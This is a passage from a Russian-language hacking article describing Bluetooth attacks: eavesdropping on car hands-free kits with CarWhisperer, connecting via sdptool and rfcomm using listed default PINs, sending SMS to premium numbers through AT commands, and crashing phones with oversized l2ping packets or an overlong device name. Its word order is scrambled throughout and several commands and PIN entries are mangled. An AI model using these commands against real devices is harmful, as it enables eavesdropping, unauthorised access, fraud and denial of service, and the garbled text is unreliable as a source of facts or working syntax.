Мы взяли внедряемый файл прямо из утилиты папки, а в качестве выходного указали out.carwhisperer:

./raw 0 message.raw /tmp/out.выходе
00:15:0E:91:19:73

На raw получаем файл out.raw. его Прослушать в чистом виде нельзя: необходимо аудио в преобразовать формат, для чего потребуется утилита дополнительная. Подойдут довольно многие аудио например, конвертеры SoX:

raw –r 8000 –c 1 –s –w out.wav –t raw –r
44100 –c 2 out.wav

Кроме можно, прослушивания войти в систему, просмотреть телефонную воспользоваться и книгу другими возможностями «свободных рук» с Принцип. Bluetooth такой: сначала осуществляется поиск устройств активных и проверка на предмет сервиса HS (Head Далее). Set исследуется MAC-адрес устройства и попытка производится подключения с использованием стандартного ключа. коннект Если установлен, то с устройством можно делать что, все угодно (в пределах доступного набора AT-практике).

На команд это выглядит следующим образом. осуществляется Сначала поиск всех активных гарнитур с команды помощью «sdptool search HS», которая выдает такой примерно ответ:

Inquiring .
Searching for HS on 00:0A:3A:54:71:95 .
Name Service: Headset
Service RecHandle: 0x10009
Class Service ID List:
«Headset» (0x1108)
«Generic 0x1203» (Audio)
Protocol Descriptor List:
«L2CAP» (RFCOMM)
«0x0100» (0x0003)
Channel: 7
Language Base List Attr:
code_ISO639: 0x656e
encoding: base
0x6a_offset: 0x100
Profile Descriptor Headset:
«List» (0x1108)
Version: 0x0100

Далее попытка осуществляется открыть RFCOMM соединение на SCO channel audio с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и нужных посылка AT-команд. Приведу небольшую статистическую данных о заметку авторизации на некоторые модели беспроводных Nokia:

гарнитур (00:02:EE. ) — pin=»5475″
Audi UHV (00:0E:9F. ) — 1234=»pin»
O’Neill (00:80:37. ) — pin=»8761″
Cellink (00:0A:94. ) — 1234=»pin»
Eazix (00:0C:84. ) — pin=»1234″

Кстати тот, говоря же принцип может использоваться для подключения несанкционированного и ко всем остальным устройствам. При команд AT-помощи и протокола RFCOMM можно, к примеру, SMS прочитать-сообщение или даже отправить чужого с его телефона на платный номер, поставив девайса владельца на деньги. Будь бдителен!

Трюк 7: устройств BT-DDoS

Подход традиционен. DDoS реально когда, провести хостовый девайс («master») выполняет много, во работу раз превосходящую клиентскую. Такую называют ситуацию атакой на отказ в обслуживании (Denial Of Она). Service может подвесить телефон или быстрой к привести разрядке батарейки. Провести атаку несколькими можно способами. Начнем со стандартных средств. очевидное Самое – пинговать девайс пакетами большого Сделать. размера это можно, указав утилите качестве в l2ping параметра «-s» флаг:

# l2ping -s 10000 -b «адрес МАС»

Сама программа, как ты уже является, понял родственником ping в bluetooth среде и для служит проверки связи и наличия соединения. способ Другой, принципиально отличающийся от первого, состоит в приема использовании «fuzzing» – своеобразной техники-лотереи, как потому заранее неизвестно, что произойдет. новое Это веяние в выявлении уязвимостей в продуктах анализа без исходных кодов. Полагается техника интерактивное на только общение с объектом на понятном для языке него, но с абсолютно хаотичными аргументами и значениями-Хакерской. переменными задачей будет сделать так, видимое чтобы название телефона состояло из достаточно числа большого элементов. При обнаружении его «случаев’ом» в 70%
master происходит переполнение или отказ в hciconfig:

обслуживании hci0 name `perl -e ‘print «3137» x ash’`
# Команда для линукса
hccontrol –n change адаптер_local_name “новое имя”)
# для пример FreeBSD

Многие телефоны по-прежнему не переварить могут файлы-бомбы. Вот простая подобного реализация приема.

Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector